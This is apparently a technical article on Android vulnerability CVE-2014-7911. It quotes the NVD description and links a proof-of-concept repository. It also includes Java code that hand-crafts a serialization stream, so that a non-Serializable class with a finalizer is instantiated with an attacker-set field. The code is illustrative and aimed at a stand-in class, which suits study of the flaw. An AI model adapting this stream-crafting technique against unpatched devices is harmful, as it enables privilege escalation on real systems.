Contents of this article:
- Android local privilege escalation via an Android deserialization vulnerability
- ROP on Android: bypassing DEP
- Bypassing ASLR on Android
- Android Binder
- Java serialization and deserialization
- Heap Spray
CVE-2014-7911
Excerpted from NVD
luni/src/main/java/java/io/ObjectInputStream.java in the java.io.ObjectInputStream implementation in Android before 5.0.0 does not verify that deserialization will result in an object that met the requirements for serialization, which allows attackers to execute arbitrary code via a crafted finalize method for a serialized object in an ArrayMap Parcel within an intent sent to system_service, as demonstrated by the finalize method of android.os.BinderProxy, aka Bug 15874291.
Source: MITRE
Description Last Modified: 12/15/2014
POC: https://github.com/CytQ/CVE-2014-7911_poc
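The root cause in the NVD text is that the Android (pre-5.0) ObjectInputStream instantiated whatever class the stream's class descriptor named, whether or not that class implemented java.io.Serializable, so an attacker could have the garbage collector run the finalize() of a class that was never meant to be deserialized, with its fields filled from the stream. The following is an added example, not code from the original article or from the linked PoC: it builds a Java serialization stream by hand for a stand-in class (NativeHandle, not Serializable, with a finalizer that consumes a long, in the role of android.os.BinderProxy) and feeds it to a stock JVM, which rejects it with InvalidClassException; a vulnerable receiver would instead create the object and later run finalize() on it. The field name mObject, the serialVersionUID of 0L and the stand-in class are assumptions for illustration, not details taken from the page.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.DataOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputStream;
import java.io.ObjectStreamConstants;
import java.io.Serializable;

/**
 * Added example for CVE-2014-7911 (not from the original post or its PoC).
 * Hand-crafts a serialization stream whose class descriptor names a class
 * that is NOT Serializable but defines finalize(), then deserializes it.
 */
public class NotSerializableFinalizer {

    /**
     * Stand-in for android.os.BinderProxy: not Serializable, with a finalizer
     * that acts on an attacker-controlled long (BinderProxy hands a native
     * pointer to native code). The field name mObject is an assumption.
     */
    public static class NativeHandle {
        private long mObject;                       // would be a native pointer on Android

        @Override
        protected void finalize() {
            // On a vulnerable receiver this runs on the deserialized object even
            // though no constructor ran and the class is not Serializable.
            System.out.println("finalize() with mObject=0x" + Long.toHexString(mObject));
        }
    }

    /**
     * The check the vulnerable ObjectInputStream omitted: only classes that
     * implement Serializable (Externalizable extends it) may be instantiated
     * from a stream.
     */
    public static boolean mayDeserialize(Class<?> c) {
        return Serializable.class.isAssignableFrom(c);
    }

    /**
     * Stream layout (Java Object Serialization Stream Protocol):
     * STREAM_MAGIC, STREAM_VERSION, TC_OBJECT, TC_CLASSDESC, className,
     * serialVersionUID, flags, field count, one 'J' (long) field descriptor,
     * TC_ENDBLOCKDATA (no class annotation), TC_NULL (no superclass),
     * then the field value. The flags claim SC_SERIALIZABLE regardless of
     * what the named class actually implements; only the receiver can check.
     */
    public static byte[] craftStream(String className, long suid,
                                     String fieldName, long fieldValue) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        DataOutputStream out = new DataOutputStream(bos);
        out.writeShort(ObjectStreamConstants.STREAM_MAGIC);
        out.writeShort(ObjectStreamConstants.STREAM_VERSION);
        out.writeByte(ObjectStreamConstants.TC_OBJECT);
        out.writeByte(ObjectStreamConstants.TC_CLASSDESC);
        out.writeUTF(className);
        out.writeLong(suid);                                    // must match the receiver's SUID on a real target
        out.writeByte(ObjectStreamConstants.SC_SERIALIZABLE);   // attacker-asserted flag
        out.writeShort(1);                                      // one field
        out.writeByte('J');                                     // primitive long
        out.writeUTF(fieldName);
        out.writeByte(ObjectStreamConstants.TC_ENDBLOCKDATA);
        out.writeByte(ObjectStreamConstants.TC_NULL);
        out.writeLong(fieldValue);                              // value the finalizer will see
        out.flush();
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        byte[] payload = craftStream(NativeHandle.class.getName(), 0L,
                                     "mObject", 0x4141414141414141L);
        System.out.println("class is Serializable: " + mayDeserialize(NativeHandle.class));
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(payload))) {
            Object o = in.readObject();
            // A vulnerable receiver reaches this line; the object is unreachable
            // as soon as it is dropped and its finalize() runs on the GC thread.
            System.out.println("deserialized: " + o.getClass().getName());
        } catch (InvalidClassException e) {
            // Stock JVM behaviour (and Android >= 5.0): the class is refused
            // before any instance exists, so finalize() never runs.
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

On a stock JVM the output is the "rejected" branch, because ObjectInputStream compares the stream's SC_SERIALIZABLE flag against the local class and refuses a class that does not implement Serializable. On a real Android < 5.0 target the stream additionally has to carry the serialVersionUID the device computes for the target class, and the stream would travel inside an Intent extra rather than a byte array; those details are outside this example.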